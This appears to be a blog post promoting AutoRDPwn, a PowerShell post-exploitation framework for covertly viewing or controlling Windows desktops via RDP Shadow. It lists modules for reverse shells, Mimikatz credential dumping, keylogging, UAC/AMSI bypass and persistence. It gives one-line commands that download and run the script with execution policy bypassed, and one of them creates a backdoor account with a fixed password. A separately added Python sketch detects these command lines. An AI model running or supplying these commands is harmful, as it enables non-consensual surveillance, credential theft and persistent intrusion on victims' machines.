![AutoRDPwn_1.png](https://1.bp.blogspot.com/-1zZYz_npmuI/XV9N3oewuCI/AAAAAAAAQHw/lOyivUrkbnA4Y6TWDd04keqwE37K8sQfgCLcBGAs/s640/AutoRDPwn_1.png)
AutoRDPwn is a post-exploitation framework created in PowerShell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view the victim's desktop without the victim's consent, and even control it on demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.
Requirements
PowerShell 4.0 or higher
Changes
Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI Bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file
Use
This application can be used locally, remotely or to pivot between teams.
When used remotely in a reverse shell, it is necessary to use the following parameters:
-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteeing its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine
Local execution on one line:
powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Example of remote execution on a line:
powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
The detailed guide of use can be found at the following link:
![AutoRDPwn.png](https://darkbyte.net/wp-content/uploads/2018/09/La%20guia%20definitiva/AutoRDPwn.png)
Darkbyte • AutoRDPwn - The definitive guide
After two months of intense development, AutoRDPwn is more powerful and functional than ever. Thanks to the success it has had, I have decided to create a guide.
darkbyte.net
Screenshots
![AutoRDPwn_2.png](https://1.bp.blogspot.com/-79EiICS61ZQ/XV9OAnoaCaI/AAAAAAAAQH0/FSHTYXo4n_U2r6DWHncEr71B6oYxdMCNACLcBGAs/s640/AutoRDPwn_2.png)
![AutoRDPwn_3.png](https://1.bp.blogspot.com/-nMjN4Lb-hjw/XV9OAnnw8vI/AAAAAAAAQH4/GuqXqpW-yAc6YXDQa348gv1ijMIcvxUvwCLcBGAs/s640/AutoRDPwn_3.png)
Download AutoRDPwn
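A defender-side detection sketch, added here and not part of the original post or of AutoRDPwn: it matches the command-line switches listed in the usage section against process-creation events and interprets the Remote Desktop Services `Shadow` policy value. The event records are constructed samples, the function names are hypothetical, and the policy registry location is standard Windows Group Policy rather than something the post states.

```python
import re

# "Shadow" DWORD under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services
# (standard Group Policy setting; assumption, not stated in the post).
SHADOW_POLICY = {
    0: "remote control not allowed",
    1: "full control with user's permission",
    2: "full control without user's permission",
    3: "view session with user's permission",
    4: "view session without user's permission",
}
NO_CONSENT = {2, 4}  # values that skip the consent prompt

# Indicators taken from the usage section of the post.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-(?:ep|ex\w*)\s+bypass\b", re.I),
    "download_to_file": re.compile(r"\b(?:iwr|invoke-webrequest)\b.*-outfile\b", re.I),
    "script_name": re.compile(r"autordpwn", re.I),  # also hits the account name
    "tool_switches": re.compile(r"-(?:nogui|noadmin|createuser)\b", re.I),
    "shadow_switch": re.compile(r"-shadow\s+\w+", re.I),
}

def match_indicators(cmdline):
    """Return the sorted names of indicators present in a command line."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(cmdline))

def triage(events):
    """Yield (host, severity, hits) for process-creation events worth review."""
    for ev in events:
        hits = match_indicators(ev["cmdline"])
        if not hits:
            continue
        # The tool's name, or its switches used together, is a strong signal;
        # an execution-policy bypass alone is common in admin scripts.
        high = "script_name" in hits or {"shadow_switch", "tool_switches"} <= set(hits)
        yield ev["host"], ("high" if high else "low"), hits

def shadow_policy_finding(value):
    """Describe a Shadow policy value and flag the no-consent settings."""
    meaning = SHADOW_POLICY.get(value, "unknown value")
    return {"value": value, "meaning": meaning, "no_consent": value in NO_CONSENT}

# Constructed sample events (not real telemetry).
SAMPLE = [
    {"host": "WS01", "cmdline": 'powershell -ep bypass "cd $env:temp; '
        'iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; '
        '.\\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 '
        '-shadow control -createuser"'},
    {"host": "WS02", "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\it\\inventory.ps1"},
    {"host": "WS03", "cmdline": "notepad.exe C:\\notes.txt"},
]
```

In practice the events would come from process-creation logging (command-line auditing or Sysmon), and the policy value from a registry read on each host.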